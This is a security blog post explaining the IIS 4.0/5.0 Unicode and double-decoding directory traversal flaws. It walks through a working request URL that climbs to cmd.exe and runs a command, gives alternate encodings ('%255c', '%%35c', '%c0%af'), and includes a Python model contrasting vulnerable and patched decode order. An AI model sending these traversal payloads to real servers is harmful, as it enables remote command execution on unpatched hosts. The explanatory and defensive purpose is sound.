DEVIL'S BLOG ON SECURITY


A DEVIL'S BLOG ON COMPUTER AND INFORMATION SECURITY, ETHICAL HACKING AND COUNTERMEASURES


Unicode Exploit And Directory Traversal

Unicode defines a code space of more than a million code points (1,114,112), enough to cover the letters and symbols of every script in every language and region. A single character can be carried in more than one byte-level form depending on the transfer format (UTF-8, UTF-16 and so on). On the web a second layer sits on top of that: HTTP percent-encoding, in which a byte is written as "%" followed by two hex digits, so a period is %2E and a forward slash is %2F. The IIS bug lives in the interaction of the two layers. The UTF-8 standard requires each character to be written in its shortest form, but the IIS decoder also accepted the non-shortest ("overlong") forms, so %c0%af (bytes C0 AF) was decoded to "/" and %c1%9c to "\", even though a conforming decoder must reject both.

This Unicode handling is enabled by default in IIS 4.0 and 5.0. IIS 7 is current, so why discuss IIS 4.0 and 5.0? Because IIS 5.0 is installed by default with Windows 2000 Server (Windows Server 2003 ships IIS 6.0, a rewrite that is not affected and is not installed by default), and there are still many sites running unpatched IIS 5.0. An attacker who finds someone running such an old system will surely take advantage of it. Read the posts on banner grabbing and methods to grab banners for how the server version is identified.

http://example.com/scripts/..%255c../winnt/system32/cmd.exe?/c+cd+c:

Look at the URL above: the path segment "..%255c.." is what does the work. %25 is the percent-encoding of "%" itself, so one decoding pass turns %255c into %5c, and a second pass turns %5c into a backslash, giving "..\..": two steps up the directory tree, which is what directory traversal means. The question mark after cmd.exe starts the query string, which IIS passes to the executable as its command line; "/c" tells cmd.exe to run the command that follows and exit, and each plus sign is decoded to a space between arguments. Fully decoded, the request is equivalent to:

http://example.com/scripts/../../winnt/system32/cmd.exe?/c+cd+c:

IIS rejects that plain URL by default: it canonicalises the path and refuses any request that climbs out of its virtual directory. So the attacker writes the separator as "%255c" instead. IIS runs its traversal check after decoding the URL once, when the path still reads "..%5c.." and contains no separator, and then decodes it a second time on the way to the file system (Microsoft called this the "superfluous decoding" bug, MS01-026). By the time %5c becomes "\" the check has already passed. "%%35c" works the same way (the first pass turns %35 into "5", leaving %5c for the second pass), and so does the older overlong-UTF-8 form "..%c0%af.." from MS00-078, where the check ran before the UTF-8 decoding that turns C0 AF into "/"; in general, anything that only becomes a slash or backslash after the check has run will do. Because the whole attack is a single HTTP GET, it can be launched straight from a web browser with no extra tools. The number of "..%255c" steps does not have to be exact: there must be enough of them to climb from the virtual directory (C:\Inetpub\scripts on a default install) up to the drive root, and extra steps are harmless because ".." at the root stays at the root. Finally, although this gives remote command execution, it is not a shell: each request spawns one non-interactive cmd.exe that runs as the IIS anonymous account (IUSR_machinename), its output comes back in the HTTP response, and anything that needs an interactive session or administrator rights will fail.
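The decode-ordering flaw described in the two paragraphs above (the overlong UTF-8 forms and the double-decoded "%255c"), as an added example that is not part of the original post and is not IIS source code: a small Python model of the pipeline, with the check run between the first and second decode as in the unpatched server, beside the corrected order. The virtual-directory layout (C:\Inetpub\scripts, C:\Inetpub\wwwroot), the function names, and the two-stage pipeline are assumptions and simplifications chosen for the illustration.

```python
# Added illustration for this post (not IIS code, not the article's code): a
# simplified model of the IIS 4/5 decode-ordering bug.  The vroot layout below
# is an assumed default Windows 2000 / IIS 5 install, not a real host.
import ntpath
from urllib.parse import urlsplit

VROOTS = {"/scripts": r"C:\Inetpub\scripts", "/": r"C:\Inetpub\wwwroot"}
HEX = b"0123456789abcdefABCDEF"

def percent_decode(data: bytes) -> bytes:
    """One pass of %XX decoding; a '%' not followed by two hex digits is kept,
    which is why '%%35c' comes out of one pass as '%5c'."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] == 0x25 and i + 2 < len(data) and data[i + 1] in HEX and data[i + 2] in HEX:
            out.append(int(data[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)

def utf8_lenient(data: bytes) -> str:
    """UTF-8 with the unpatched IIS flaw: overlong two-byte forms (lead byte 0xC0/0xC1,
    forbidden by the standard) are accepted, so %c0%af -> '/' and %c1%9c -> '\\'."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))  # other bytes pass through as Latin-1
            i += 1
    return "".join(out)

def map_to_disk(url_path: str) -> tuple[str, str]:
    """Map through the longest matching vroot and canonicalise with Windows rules
    ('/' == '\\', '..' collapsed, '..' at the drive root ignored) -> (vroot, path)."""
    for prefix in sorted(VROOTS, key=len, reverse=True):
        base = prefix.rstrip("/")
        if url_path == base or url_path.startswith(base + "/"):
            root, rest = VROOTS[prefix], url_path[len(base):].lstrip("/")
            return root, ntpath.normpath(ntpath.join(root, rest))
    raise FileNotFoundError(url_path)

def vulnerable_resolve(url_path: str) -> str:
    """Unpatched order: percent-decode once and run the containment check on that
    (no UTF-8 decoding yet); then, mapping to disk, percent-decode a SECOND time and
    apply the lenient UTF-8 decoder.  A separator born in step two was never checked."""
    once = percent_decode(url_path.encode("ascii"))
    root, checked = map_to_disk(once.decode("latin-1"))
    if not (checked == root or checked.startswith(root + "\\")):
        raise PermissionError("403: request escapes its virtual directory")
    return map_to_disk(utf8_lenient(percent_decode(once)))[1]  # the bug

def patched_resolve(url_path: str) -> str:
    """Fixed order: decode exactly once, strictly, canonicalise, and only then
    check containment on the path that will actually be opened."""
    try:
        decoded = percent_decode(url_path.encode("ascii")).decode("utf-8")
    except UnicodeDecodeError:
        raise ValueError("400: malformed UTF-8 in request") from None
    root, final = map_to_disk(decoded)
    if not (final == root or final.startswith(root + "\\")):
        raise PermissionError("403: request escapes its virtual directory")
    return final

def outcome(resolver, url_path: str) -> str:
    """Return the resolved disk path, or the error text the server would send."""
    try:
        return resolver(url_path)
    except (PermissionError, ValueError) as exc:
        return str(exc)

def split_command(url: str) -> tuple[str, str]:
    """Path and command line: the query after '?' becomes cmd.exe's arguments,
    with '+' decoded to a space."""
    parts = urlsplit(url)
    argv = percent_decode(parts.query.replace("+", " ").encode("ascii"))
    return parts.path, argv.decode("latin-1")

def traversal_url(depth: int, command: str = "cd+c:") -> str:
    """The post's request with `depth` double-encoded '..\\' steps."""
    return ("http://example.com/scripts/" + "..%255c" * depth
            + "winnt/system32/cmd.exe?/c+" + command)

if __name__ == "__main__":
    for p in ("/scripts/../../winnt/system32/cmd.exe",       # plain: blocked
              "/scripts/..%5c../winnt/system32/cmd.exe",     # once-encoded: blocked
              "/scripts/..%255c../winnt/system32/cmd.exe",   # MS01-026 form
              "/scripts/..%%35c../winnt/system32/cmd.exe",   # same, other spelling
              "/scripts/..%c0%af../winnt/system32/cmd.exe"):  # MS00-078 form
        print(f"{p:44} unpatched: {outcome(vulnerable_resolve, p)}")
        print(f"{'':44} patched:   {outcome(patched_resolve, p)}")
    for depth in (1, 2, 6):  # too few steps lands elsewhere; extra ones are harmless
        path, argv = split_command(traversal_url(depth))
        print(f"depth {depth}: {outcome(vulnerable_resolve, path)}  args: {argv!r}")
```

Running the script shows the three encoded forms resolving to C:\winnt\system32\cmd.exe on the unpatched model while the plain and once-encoded forms get a 403, and the patched model either keeps the request inside C:\Inetpub\scripts or rejects the overlong bytes outright. The depth loop shows why the count of "..%255c" steps only has to be large enough: one step lands in C:\Inetpub, while two and six both reach the drive root.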

In the next part we will discuss how this vulnerability can be exploited with our favourite tool, netcat. Until then, thanks for reading, have a nice time and keep visiting.
